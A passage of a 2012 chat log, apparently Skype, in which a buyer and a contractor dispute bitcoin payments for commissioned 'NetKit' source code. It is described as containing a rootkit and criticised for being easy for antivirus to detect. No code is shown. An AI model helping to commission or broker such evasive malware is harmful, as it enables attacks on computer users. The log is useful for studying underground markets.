  2515. [12/20/2012 2:11:03 AM] Shelly Bongo: it's clearly untested
  2516. [12/20/2012 2:11:20 AM] Shelly Bongo: and using generic routines that make it easily detectable by AVs, although it's supposedly "custom coded"
  2517. [12/20/2012 2:11:37 AM] ' Tweety HF;: you're not understanding the term of generic
  2518. [12/20/2012 2:11:58 AM] Shelly Bongo: i lost a job because of you.
  2519. [12/20/2012 2:12:13 AM] Shelly Bongo: anyway, 100 or nothing
  2520. [12/20/2012 2:12:15 AM] Shelly Bongo: good luck.
  2521. [12/20/2012 2:12:43 AM] ' Tweety HF;: $150 and its all yours.
  2522. [12/20/2012 2:13:09 AM] Shelly Bongo: i have serious trust issues when it comes to you, if i send you 150$ - i don't believe i'll get the source.
  2523. [12/20/2012 2:13:36 AM] ' Tweety HF;: i dont need the source
  2524. [12/20/2012 2:13:59 AM] Shelly Bongo: i don't care if you need it or not - you're unreliable
  2525. [12/20/2012 2:14:05 AM] Shelly Bongo: i won't send you 150$
  2526. [12/20/2012 2:14:11 AM] Shelly Bongo: with the hopes of getting the source
  2527. [12/20/2012 2:14:26 AM] Shelly Bongo: 50%/50%
  2528. [12/20/2012 2:14:37 AM] Shelly Bongo: i send half, deliver the source, i send the other half
  2529. [12/20/2012 2:15:12 AM] Shelly Bongo: decide how you want to proceed, i'm going in 5min
  2530. [12/20/2012 2:15:17 AM] Shelly Bongo: we can speak again tomorrow.
  2531. [12/20/2012 2:15:22 AM] ' Tweety HF;: dude, send it all.
  2532. [12/20/2012 2:15:23 AM] ' Tweety HF;: and you get the source.
  2533. [12/20/2012 2:15:29 AM] Shelly Bongo: not going to happen.
  2534. [12/20/2012 2:15:33 AM] ' Tweety HF;: i can easily sell this useless source for more than $250
  2535. [12/20/2012 2:15:42 AM] ' Tweety HF;: it has a darkfiresc rootkit
  2536. [12/20/2012 2:15:48 AM] Shelly Bongo: go ahead, anyone who buys it is a sucker.
  2537. [12/20/2012 2:16:11 AM] ' Tweety HF;: you have no choice but to trust me
  2538. [12/20/2012 2:16:17 AM] ' Tweety HF;: i dont need it
  2539. [12/20/2012 2:16:19 AM] ' Tweety HF;: you do
  2540. [12/20/2012 2:16:28 AM] Shelly Bongo: i have a choice - i have other contractors.
  2541. [12/20/2012 2:16:47 AM] Shelly Bongo: i'm not paying up front - i agree to bump to 150, but not all of it up front.
  2542. [12/20/2012 2:16:52 AM] ' Tweety HF;: fine
  2543. [12/20/2012 2:16:54 AM] Shelly Bongo: i already paid up front.
  2544. [12/20/2012 2:17:02 AM] ' Tweety HF;: hold on
  2545. [12/20/2012 2:17:04 AM] ' Tweety HF;: we can use a staff member
  2546. [12/20/2012 2:17:06 AM] ' Tweety HF;: as MM?
  2547. [12/20/2012 2:17:06 AM] ' Tweety HF;: deal/
  2548. [12/20/2012 2:17:17 AM] Shelly Bongo: what staff member
  2549. [12/20/2012 2:17:22 AM] Shelly Bongo: and what's MM?
  2550. [12/20/2012 2:17:28 AM] ' Tweety HF;: Staff member on HF
  2551. [12/20/2012 2:17:34 AM] ' Tweety HF;: i done over $600 in deals with him
  2552. [12/20/2012 2:17:37 AM] ' Tweety HF;: and MM = Middle Man
  2553. [12/20/2012 2:17:45 AM] Shelly Bongo: ok
  2554. [12/20/2012 2:18:00 AM] Shelly Bongo: but i'm not paying your friends up front either.
  2555. [12/20/2012 2:18:12 AM] ' Tweety HF;: what friends?
  2556. [12/20/2012 2:18:30 AM] Shelly Bongo: your forum friends, this staff member "middle man"
  2557. [12/20/2012 2:18:45 AM] ' Tweety HF;: this staff member is the most legit guy you will ever know
  2558. [12/20/2012 2:18:52 AM] ' Tweety HF;: http://www.xch4ng3.com/
  2559. [12/20/2012 2:19:08 AM] Shelly Bongo: yes but you are not.
  2560. [12/20/2012 2:19:14 AM] Shelly Bongo: you can supply code that has been ripped apart
  2561. [12/20/2012 2:19:19 AM] Shelly Bongo: you can take out the rootkit from this
  2562. [12/20/2012 2:19:20 AM] Shelly Bongo: etc.
  2563. [12/20/2012 2:19:23 AM] Shelly Bongo: don't trust you
  2564. [12/20/2012 2:19:26 AM] Shelly Bongo: you fucked up with timing
  2565. [12/20/2012 2:19:29 AM] Shelly Bongo: you fucked up with features
  2566. [12/20/2012 2:19:29 AM] ' Tweety HF;: no no
  2567. [12/20/2012 2:19:34 AM] ' Tweety HF;: i been waiting for you 2 days
  2568. [12/20/2012 2:19:38 AM] ' Tweety HF;: you wasn't online on my time zone
  2569. [12/20/2012 2:19:43 AM] Shelly Bongo: i've been waiting for you for longer than that.
  2570. [12/20/2012 2:20:07 AM] Shelly Bongo: you know you were dragging me along, with "your breakup" or whatever other excuse i don't care about
  2571. [12/20/2012 2:20:11 AM] Shelly Bongo: we had a deadline you missed
  2572. [12/20/2012 2:20:16 AM] Shelly Bongo: cost me a job
  2573. [12/20/2012 2:20:17 AM] ' Tweety HF;: no.
  2574. [12/20/2012 2:20:19 AM] ' Tweety HF;: i delivered.
  2575. [12/20/2012 2:20:25 AM] ' Tweety HF;: you wasn't online on my time
  2576. [12/20/2012 2:20:27 AM] Shelly Bongo: i have to go
  2577. [12/20/2012 2:20:29 AM] ' Tweety HF;: you know i have work and college
  2578. [12/20/2012 2:20:43 AM] Shelly Bongo: if you want to do the $150 50%/50% deal now we can
  2579. [12/20/2012 2:20:44 AM] Shelly Bongo: if not speak tomorrow
  2580. [12/20/2012 2:20:53 AM] Shelly Bongo: i'm not going to pay up front again, already did that
  2581. [12/20/2012 2:20:57 AM] Shelly Bongo: now it's your turn
  2582. [12/20/2012 2:21:10 AM] ' Tweety HF;: fine, il send you half of the source
  2583. [12/20/2012 2:21:12 AM] ' Tweety HF;: if you send half now
  2584. [12/20/2012 2:21:16 AM] ' Tweety HF;: and vice versa
  2585. [12/20/2012 2:21:17 AM] Shelly Bongo: no
  2586. [12/20/2012 2:21:22 AM] Shelly Bongo: i already SENT you money
  2587. [12/20/2012 2:21:24 AM] Shelly Bongo: you sent me NOTHING
  2588. [12/20/2012 2:21:36 AM] ' Tweety HF;: fine
  2589. [12/20/2012 2:21:39 AM] ' Tweety HF;: we can play your game
  2590. [12/20/2012 2:21:44 AM] Shelly Bongo: i'm not playing a game
  2591. [12/20/2012 2:21:49 AM] Shelly Bongo: i thought i was doing business
  2592. [12/20/2012 2:22:01 AM] Shelly Bongo: but i guess that's not something that somebody your age can do responsively.
  2593. [12/20/2012 2:22:21 AM] ' Tweety HF;: we can go half n half
  2594. [12/20/2012 2:22:22 AM] ' Tweety HF;: now
  2595. [12/20/2012 2:22:40 AM] Shelly Bongo: i send you 75$, you give me source, i check it and compile to see it works
  2596. [12/20/2012 2:22:44 AM] Shelly Bongo: and then send you $75 more
  2597. [12/20/2012 2:22:52 AM] Shelly Bongo: if you want we can do it right now
  2598. [12/20/2012 2:23:00 AM] ' Tweety HF;: Alright
  2599. [12/20/2012 2:23:19 AM] Shelly Bongo: give me bitcoin address
  2600. [12/20/2012 2:23:45 AM] ' Tweety HF;: 1 sec
  2601. [12/20/2012 2:25:28 AM] Shelly Bongo: just download the bitcoin client yourself
  2602. [12/20/2012 2:25:37 AM] Shelly Bongo: you can transfer it to your exchangers later
  2603. [12/20/2012 2:25:47 AM] Shelly Bongo: the transfer is free in bitcoin.
  2604. [12/20/2012 2:25:56 AM] ' Tweety HF;: oh
  2605. [12/20/2012 2:25:58 AM] ' Tweety HF;: alright
  2606. [12/20/2012 2:27:36 AM] ' Tweety HF;: 18VNmrqi7gd5hfteYQb3Cf2sgnzvnT4qfh
  2607. [12/20/2012 2:29:18 AM] Shelly Bongo: ok
  2608. [12/20/2012 2:29:21 AM] Shelly Bongo: 5.59297 BTC
  2609. [12/20/2012 2:29:34 AM] Shelly Bongo: (mtgox.com weighted USD-BTC average price)
  2610. [12/20/2012 2:29:47 AM] ' Tweety HF;: sec checking
  2611. [12/20/2012 2:30:23 AM] Shelly Bongo: sent.
  2612. [12/20/2012 2:30:35 AM] Shelly Bongo: it takes it a while to get confirmed by the BT network
  2613. [12/20/2012 2:30:38 AM] ' Tweety HF;: so as soon as i send source, il get the other half?
  2614. [12/20/2012 2:30:42 AM] Shelly Bongo: yes
  2615. [12/20/2012 2:33:07 AM] Shelly Bongo: well?
  2616. [12/20/2012 2:33:38 AM] ' Tweety HF;: syncing
  2617. [12/20/2012 2:33:44 AM] ' Tweety HF;: http://puu.sh/1CV1m
  2618. [12/20/2012 2:34:12 AM] Shelly Bongo: it can take 8+ hours to sync for that long... BTC clients are meant to be open all the time - if they are outdated, it takes a long time to sync.
  2619. [12/20/2012 2:35:22 AM] ' Tweety HF;: its not outdated.
  2620. [12/20/2012 2:35:29 AM] ' Tweety HF;: give it a few mins
  2621. [12/20/2012 2:35:43 AM] ' Tweety HF;: we can continue tomorrow if it takes too long
  2622. [12/20/2012 2:35:49 AM] ' Tweety HF;: il be waiting, same time
  2623. [12/20/2012 2:36:01 AM] Shelly Bongo: how likely of you to say that after i sent you funds.
  2624. [12/20/2012 2:36:10 AM] Shelly Bongo: just receive it and lets complete it now
  2625. [12/20/2012 2:36:14 AM] Shelly Bongo: i have waited enough
  2626. [12/20/2012 2:36:20 AM] ' Tweety HF;: i dunno if i received yet.
  2627. [12/20/2012 2:39:42 AM] Shelly Bongo: did sync finish yet?
  2628. [12/20/2012 2:41:47 AM] Shelly Bongo: okay, i need to leave - hopefully you will see the BTC got transferred soon - and then, please send the full netkit source to my skype
  2629. [12/20/2012 2:41:55 AM] Shelly Bongo: i'll click 'save' on the file transfer tomorrow
  2630. [12/20/2012 2:42:01 AM] Shelly Bongo: have to leave
  2631. [12/20/2012 2:42:38 AM] ' Tweety HF;: ok
  2632. [12/20/2012 2:06:14 PM] Shelly Bongo: hello?
  2633. [12/20/2012 2:06:35 PM] Shelly Bongo: my transaction has already been confirmed by the BT network
  2634. [12/20/2012 2:06:43 PM] Shelly Bongo: source code?
  2635. [12/20/2012 3:13:15 PM] Shelly Bongo: ran away?
  2636. [12/20/2012 3:14:55 PM] Shelly Bongo: if you screw me over again, i'm posting all about you in the forums
  2637. [12/20/2012 3:15:11 PM] Shelly Bongo: you have till end of the day to send the source
  2638. [12/20/2012 4:48:55 PM] Shelly Bongo: i thought about it and decided it's not right to send you only $150, i'm a person of my word and we did agree to 350$ - so i will pay an extra 200, not 150.  meaning the next transfer will have 125 instead of 75.
  2639.  
  2640. if you fail to deliver today, i will report you.
  2641. [12/20/2012 5:06:34 PM] ' Tweety HF;: my friends wallet is still syncing
  2642. [12/20/2012 5:06:38 PM] ' Tweety HF;: lol
  2643. [12/20/2012 5:06:45 PM] ' Tweety HF;: it should be done soon
  2644. [12/20/2012 5:10:38 PM] Shelly Bongo: http://blockchain.info/tx-index/37854118/1526ac7351e776d71159aede67eceadbbbe57423af6519705849de4734c0fd06
  2645. [12/20/2012 5:10:49 PM] Shelly Bongo: http://blockchain.info/address/18VNmrqi7gd5hfteYQb3Cf2sgnzvnT4qfh
  2646. [12/20/2012 5:10:58 PM] Shelly Bongo: the transaction was done, over 60 confirmations
  2647. [12/20/2012 5:10:59 PM] Shelly Bongo: send the source.
  2648. [12/20/2012 5:11:50 PM] ' Tweety HF;: Hold on
  2649. [12/20/2012 5:24:18 PM] Shelly Bongo: well???
  2650. [12/20/2012 5:25:23 PM] ' Tweety HF;: my friend has a crap pc so you're going to need to wait till his wallet syncs
  2651. [12/20/2012 5:25:39 PM] ' Tweety HF;: trust me, its making me mad as well. I dislike waiting to receive money as much as you dislike the wait time for the source
  2652. [12/20/2012 5:45:40 PM] Shelly Bongo: i told you what happens, you have till midnight.
  2653. [12/20/2012 5:45:50 PM] Shelly Bongo: your friend's bitcoin troubles are of no concern to me
  2654. [12/20/2012 7:38:15 PM] Shelly Bongo: besides, you can clearly see in the links i sent that the 5.x BTC *were* indeed transferred to the address of the BTC wallet you provided me
  2655. [12/20/2012 7:39:11 PM] ' Tweety HF;: i dunno how BTC work
  2656. [12/20/2012 7:41:23 PM] Shelly Bongo: don't care, send the source.
  2657. [12/20/2012 7:41:31 PM] Shelly Bongo: you got the money.
  2658. [12/20/2012 7:43:04 PM] ' Tweety HF;: Well you need to wait, I believe you said at the end of today, midnight.
  2659. [12/20/2012 7:43:23 PM] Shelly Bongo: you were supposed to send it immediately upon the receipt of the money.
  2660. [12/20/2012 7:43:39 PM] Shelly Bongo: you have been delaying ever since with "my friend has an issue, synchronizing takes time"
  2661. [12/20/2012 7:43:50 PM] Shelly Bongo: i'm sure in this time you'll be handicapping the source.
  2662. [12/20/2012 7:44:02 PM] Shelly Bongo: i'll check it, i remember what was in, i took screenshots during our sessions.
  2663. [12/20/2012 7:44:08 PM] Shelly Bongo: it better damn be the same.
  2664. [12/20/2012 9:52:19 PM] Shelly Bongo: so where would you like me to start
  2665. [12/20/2012 9:52:21 PM] Shelly Bongo: leakforums
  2666. [12/20/2012 9:52:23 PM] Shelly Bongo: hackforums
  2667. [12/20/2012 9:52:40 PM] Shelly Bongo: it's going to include your friend mephobia too, who recommended you
  2668. [12/20/2012 9:52:48 PM] Shelly Bongo: you thieving bastards will get known.
  2669. [12/20/2012 9:57:38 PM] ' Tweety HF;: I'll PM you in 2.6 hours.
  2670. [12/20/2012 11:02:46 PM] Shelly Bongo: okay, you are not getting an extra 125, but 75.
  2671. [12/20/2012 11:03:03 PM] Shelly Bongo: if you don't deliver, which will not surprise me, i'm going public
  2672. [12/20/2012 11:03:46 PM] ' Tweety HF;: And whys that?
  2673. [12/20/2012 11:03:52 PM] ' Tweety HF;: [Thursday, December 20, 2012 7:42 PM] ' Tweety HF;:
  2674.  
  2675. <<< Well you need to wait, I believe you said at the end of today, midnight.
  2676. [12/20/2012 11:04:00 PM] ' Tweety HF;: [Thursday, December 20, 2012 5:45 PM] Shelly Bongo:
  2677.  
  2678. <<< i told you what happens, you have till midnight.
  2679. [12/20/2012 11:13:30 PM] Shelly Bongo: because it's past midnight.
  2680. [12/20/2012 11:13:46 PM] ' Tweety HF;: 9:15 PM here.
  2681. [12/20/2012 11:13:59 PM] Shelly Bongo: i work by my own timezone not yours.
  2682. [12/20/2012 11:14:14 PM] Shelly Bongo: there is absolutely no reason for you to delay me like this
  2683. [12/20/2012 11:14:18 PM] ' Tweety HF;: You should have been a little more specific then.
  2684. [12/20/2012 11:14:24 PM] Shelly Bongo: it has been over 24 hours(!!!) since i send those 75 dollars man
  2685. [12/20/2012 11:14:27 PM] Shelly Bongo: what the hell are you doing?
  2686. [12/20/2012 11:14:46 PM] ' Tweety HF;: Just getting some work done
  2687. [12/20/2012 11:15:04 PM] Shelly Bongo: i'm preparing the post as we speak
  2688. [12/20/2012 11:15:13 PM] Shelly Bongo: you have exactly 10 mins to transfer the code, no more waiting
  2689. [12/20/2012 11:16:36 PM] ' Tweety HF;: http://www.youtube.com/watch?v=IHnGMV8yOEQ
  2690. [12/20/2012 11:25:11 PM] Shelly Bongo: http://www.hackforums.net/forumdisplay.php?fid=111
  2691. [12/20/2012 11:25:16 PM] Shelly Bongo: see yourself starring here in a few mins.
  2692. [12/20/2012 11:26:14 PM] ' Tweety HF;: sure.
  2693. [12/20/2012 11:27:02 PM] Shelly Bongo: so you're not providing the source?
  2694. [12/20/2012 11:27:19 PM] Shelly Bongo: you fucked me over by $225?
  2695. [12/20/2012 11:27:33 PM] ' Tweety HF;: [Thursday, December 20, 2012 11:03 PM] ' Tweety HF;:
  2696.  
  2697. <<< Well you need to wait, I believe you said at the end of today, midnight.
  2698. [12/20/2012 11:27:51 PM] Shelly Bongo: as you wish.
  2699. [12:04:52 AM] ' Tweety HF;: his GPU sucks so bad its like 2 block p/s lol
  2700. [12:05:03 AM] ' Tweety HF;: il just send you the source
  2701. [12:05:15 AM] ' Tweety HF;: and you can send the rest to the new address
  2702. [12:05:38 AM] Shelly Bongo: send the source and quit making excuses
  2703. [12:05:48 AM] ' Tweety HF;: 17WDEQTbsdqcbXCrErTmnMxtPX4TH4RYY6
  2704. [12:05:51 AM] ' Tweety HF;: 125 over there
  2705. [12:07:17 AM] Shelly Bongo: i'm not sending any money before you deliver the product you asshole - we had an agreement where you were supposed to deliver the source after i send you 150$, i paid and you didn't - then we agreed i add 75$ and you deliver - again i paid and you didn't send anything - why the hell would i send you MORE? send me the source already as agreed you scammer.
  2706. [12:07:38 AM] ' Tweety HF;: im not scamming anything.
  2707. [12:07:49 AM] ' Tweety HF;: so you're saying you wont pay on the rest of the 125 you just said you will?
  2708. [12:08:06 AM] Shelly Bongo: i will pay AFTER YOU SEND THE SOURCE AND I SEE IT'S REALLY THE PRODUCT
  2709. [12:08:25 AM] Shelly Bongo: i will not pay that *before* you send the source, i lost enough money as is and so far got nothing.
  2710. [12:08:41 AM] ' Tweety HF;: sure
  2711. [12:08:49 AM] ' Tweety HF;: Will do this my way then
  2712. [12:08:56 AM] Shelly Bongo: what way
  2713. [12:08:59 AM] ' Tweety HF;: nobody will lose
  2714. [12:09:07 AM] ' Tweety HF;: we will both be happy
  2715. [12:09:35 AM] ' Tweety HF;:
  2716.  
  2717. https://secure.join.me/487-166-070
  2718. [12:09:38 AM] ' Tweety HF;: join
  2719. [12:10:40 AM] Shelly Bongo: and what will happen there?
  2720. [12:10:57 AM] ' Tweety HF;: il show you me archiving the working netkit
  2721. [12:11:02 AM] ' Tweety HF;: and il send it
  2722. [12:11:07 AM] ' Tweety HF;: it will have a password
  2723. [12:11:11 AM] ' Tweety HF;: so you will have netkit
  2724. [12:11:14 AM] ' Tweety HF;: working
  2725. [12:11:21 AM] ' Tweety HF;: and then il give ya the pass once the pay goes through
  2726. [12:13:04 AM] Shelly Bongo: you won't give me the password
  2727. [12:13:08 AM] Shelly Bongo: send the source as agreed.
  2728. [12:13:11 AM] Shelly Bongo: we had an agreement
  2729. [12:13:14 AM] ' Tweety HF;: yes i will
  2730. [12:13:17 AM] Shelly Bongo: you keep changing your mind about the agreement
  2731. [12:13:25 AM] Shelly Bongo: you were supposed to send me the source after the 75$
  2732. [12:13:26 AM] ' Tweety HF;: because the situation changes
  2733. [12:13:47 AM] Shelly Bongo: WHAT changed in the situation? we agreed that after 75$ you send me the source and i test that it's okay
  2734. [12:13:55 AM] Shelly Bongo: i sent you the money and you aren't sending me the source
  2735. [12:13:58 AM] Shelly Bongo: but demand more money
  2736. [12:14:00 AM] Shelly Bongo: why?
  2737. [12:14:11 AM] ' Tweety HF;: because i have reason to believe its your way out
  2738. [12:14:18 AM] ' Tweety HF;: im leaving in 15 minutes
  2739. [12:14:25 AM] ' Tweety HF;: so quick plz
  2740. [12:15:20 AM] Shelly Bongo: i'm not sending you any more money, you have enough of it.
  2741. [12:15:23 AM] Shelly Bongo: i'm reporting you.
  2742. [12:15:48 AM] ' Tweety HF;: you can report me all you like
  2743. [12:15:52 AM] Shelly Bongo: you're not only a lousy coder but a lowlife as well.
  2744. [12:15:59 AM] ' Tweety HF;: it wont get either of us anywhere
  2745. [12:16:12 AM] ' Tweety HF;: im trying to make progress and get this over and done with
  2746. [12:16:45 AM] Shelly Bongo: as i said, i'm reporting you, that's it
  2747. [12:16:53 AM] Shelly Bongo: if you wish this to not be done, send the source.
  2748. [12:16:56 AM] Shelly Bongo: no passwords
  2749. [12:16:59 AM] ' Tweety HF;: no
  2750. [12:17:00 AM] ' Tweety HF;: password
  2751. [12:17:01 AM] Shelly Bongo: ok
  2752. [12:17:02 AM] ' Tweety HF;: and il send
  2753. [12:17:02 AM] ' Tweety HF;: sure
  2754. [12:17:06 AM] Shelly Bongo: then it's not going to happen.
  2755. [12:17:23 AM] *** ' Tweety HF; sent NetKit.rar ***
  2756. [12:17:26 AM] ' Tweety HF;: has a password
  2757. [12:17:38 AM] ' Tweety HF;: decline = there's no more business done
  2758. [12:17:42 AM] ' Tweety HF;: accept = we can proceed
  2759. [12:21:10 AM] ' Tweety HF;: Well im leaving soon
  2760. [12:21:48 AM] Shelly Bongo: go ahead and leave, i have no use for a password protected rar file, the only thing you can send to complete our deal is the full source code ready for my testing and analysis.
  2761. [12:22:10 AM] ' Tweety HF;: test it out all you want
  2762. [12:22:15 AM] ' Tweety HF;: you got everything you need in that file
  2763. [12:22:19 AM] Shelly Bongo: i can't if it's password protected.
  2764. [12:22:32 AM] ' Tweety HF;: il hand the password over once you pay the rest
  2765. [12:22:36 AM] ' Tweety HF;: everybody wins?
  2766. [12:22:53 AM] Shelly Bongo: [12:13 AM] Shelly Bongo:
  2767.  
  2768. <<< you won't give me the password
  2769. send the source as agreed.
  2770. we had an agreement
  2771. [12:23:37 AM] ' Tweety HF;: you refuse to use a method where both parties are kept happy
  2772. [12:23:45 AM] ' Tweety HF;: sketchy.
  2773. [12:24:37 AM] Shelly Bongo: one party isn't kept happy - that'd be me
  2774. [12:25:07 AM] Shelly Bongo: you keep milking money without supplying anything, you have 225$, what do i have? nothing
  2775. [12:25:14 AM] Shelly Bongo: i'm not sending you another dime
  2776. [12:25:19 AM] ' Tweety HF;: you got the whole project there
  2777. [12:25:25 AM] Shelly Bongo: unless you send the source and i validate it
  2778. [12:25:41 AM] ' Tweety HF;: thats why i gave you joinme link
  2779. [12:25:42 AM] Shelly Bongo: the rar is useless unless i have the password
  2780. [12:25:50 AM] ' Tweety HF;: you could watch me put netkit in the rar
  2781. [12:26:05 AM] Shelly Bongo: joinme isn't sufficient for actual testing and validation and source code review, it's just to see basic functionality
  2782. [12:26:31 AM] Shelly Bongo: we said i'll test it and pay the rest, and you're trying to avoid it, i'm sure you removed parts from the source
  2783. [12:26:43 AM] Shelly Bongo: and want to leave me with a hurt wallet and no product
  2784. [12:26:48 AM] ' Tweety HF;: i didn't remove anything
  2785. [12:27:09 AM] Shelly Bongo: well, the fact that you didn't keep your word for several times now indicates otherwise.
  2786. [12:27:31 AM] Shelly Bongo: anyway, enough talk, i told you - either send the source, no password, and after i see it's what we discussed, you get paid
  2787. [12:27:51 AM] Shelly Bongo: or we part ways, and i'll find a way to get back at you for being such a scammer.
  2788. [12:28:22 AM] ' Tweety HF;: i'm not scamming ya
  2789. [12:30:07 AM] Shelly Bongo: fact: we agreed you send the source after $150, you didn't because you were afraid i would run off with it. we agreed i'd add another 75$ and *after that* you'll send the source - now you're not doing it again.
  2790. [12:30:16 AM] Shelly Bongo: fact: i have nothing, you have $225 usd of my money
  2791. [12:30:21 AM] Shelly Bongo: that, is called a scam.
  2792. [12:30:35 AM] ' Tweety HF;: Fact: pay it off, you get everything
  2793. [12:30:51 AM] Shelly Bongo: that's not a fact you idiot, that's an offer.
  2794. [12:30:54 AM] Shelly Bongo: and the offer isn't accepted.
  2795. [12:37:56 AM] ' Tweety HF;: Look, I have your damn source. I don't care if I send it to you or if I dont. I already been paid enough to compensate for my time. You either pay it off and get your source, or you just fuck off and I don't need to bother myself with that anymore. I walk away with the well deserved cash for my time. Open your scam report, I don't give a damn. You paid for it, you don't want it. Not my problem. I'm asking you for the last time.
  2796.  
  2797. Pay up, or fuck off. I don't need this shit anymore. I have other professional customers to attend to as well as my new service. Time is money, you wasted way too much. The next reply from you should be in MY favour. If not, I'm blocking you and out you go outa my life. Open your scam report, I have enough proof of your man period swinging your terms being changed. If it's not in my favour then peace out.
  2798.  
  2799. Oh and by the way, stack up the cheese, ham with the turkey, gimme that capri-sun, bitch I'm thirsty. That's what all the Lunchablez cool kids are saying.
  2800. [12:51:31 AM] ' Tweety HF;: Should I take this as a 'fuck you'?
  2801. [12:53:17 AM] ' Tweety HF;: Alright. I'll take it as you don't want it.
  2802. [12:53:22 AM] ' Tweety HF;: Peace out.
  2803. [12:53:45 AM] Shelly Bongo: i want it as per our agreement, i don't want to be extorted.